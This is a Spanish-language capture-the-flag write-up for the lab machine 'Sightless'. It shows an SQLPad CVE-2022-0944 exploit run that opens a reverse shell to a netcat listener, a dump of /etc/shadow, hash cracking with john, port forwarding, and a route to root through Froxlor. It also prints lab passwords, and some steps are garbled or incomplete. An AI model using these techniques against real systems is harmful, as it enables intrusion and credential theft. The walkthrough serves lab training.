Sightless
Escaneo:
└─$ nmap -Pn -p- --min-rate 5000 -sC -sV -oN nmap-Sightless.txt 10.10.11.32

Entramos por el puerto 80:


Agregamos el subdominio al hosts:

La versión instalada de SQLPad, identificada como 6.10.0, se puede encontrar a través de BurpSuite. Al analizar las vulnerabilidades de esta versión, se descubrió que está afectada por CVE-2022-0944.-> ( Enlace )<-
Y tenemos otro:
Ahora ejecutaremos el siguiente codigo:
python3 exploit.py http://sqlpad.sightless.htb IP 4444
Y en escuhca:
┌──(docker㉿docker)-[~/HackBox]
└─$ nc -lvnp 4444
La cual nos da la revershell
┌──(docker㉿docker)-[~/HackBox]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.16.47] from (UNKNOWN) [10.10.11.32] 45750
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@c184118df0a6:/var/lib/sqlpad# ls

.dockerenv
archivo efectivamente está presente, lo que confirma que la aplicación se está ejecutando dentro de un contenedor Docker. Además, después de inspeccionar los usuarios del sistema, identifiqué dos cuentas: una que pertenece a “michael” y otra a “node”. Esta información sugiere que la aplicación puede estar ejecutándose en uno de estos contextos de usuario, lo que podría proporcionar posibles puntos de entrada para una mayor explotación.Para ver el archivo shadow, deberá iniciar sesión en el host con las dos cuentas de usuario proporcionadas. Este archivo contiene información confidencial sobre las contraseñas de los usuarios y sus propiedades asociadas. Para acceder a este archivo se requiere la autenticación y la autorización adecuadas. Una vez que haya iniciado sesión, podrá navegar hasta la ubicación del archivo shadow y revisar su contenido.
cat /etc/shadow

┌──(docker㉿docker)-[~/HackBox]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
┌──(docker㉿docker)-[~/HackBox]
└─$ john --show hash
?:insaneclownposse
Ahora entramos por ssh:


Hay un puerto sospechoso, el 8080, que debe investigarse. Para ello, debe reenviar el tráfico del puerto 8080 a su computadora local. Esto le permitirá examinar los datos y determinar si se están produciendo actividades inusuales.
Abrimos un tunel dinamico:
┌──(docker㉿docker)-[~/HackBox]
└─$ ssh -L 8080:localhost:8080 michael@10.10.11.32

Una mirada al archivo de host interno revela un nuevo subdominio donde la aplicación podría estar ejecutándose.
cat /etc/hosts



Cómo aprovechar el depurador remoto de Chrome
Para acceder al panel de control de Froxlor, podemos usar el exploit del depurador remoto de Chrome ( enlace ). Hay un problema de política de ejecución en la configuración de PHP-FPM para el usuario Michael en Foxlor.
administrador:ForlorfroxAdministrador

Inicie sesión a través de root usando la clave id_rsa
id_rsa raíz@10.10.11.11
Acceda al archivo root.txt

Last updated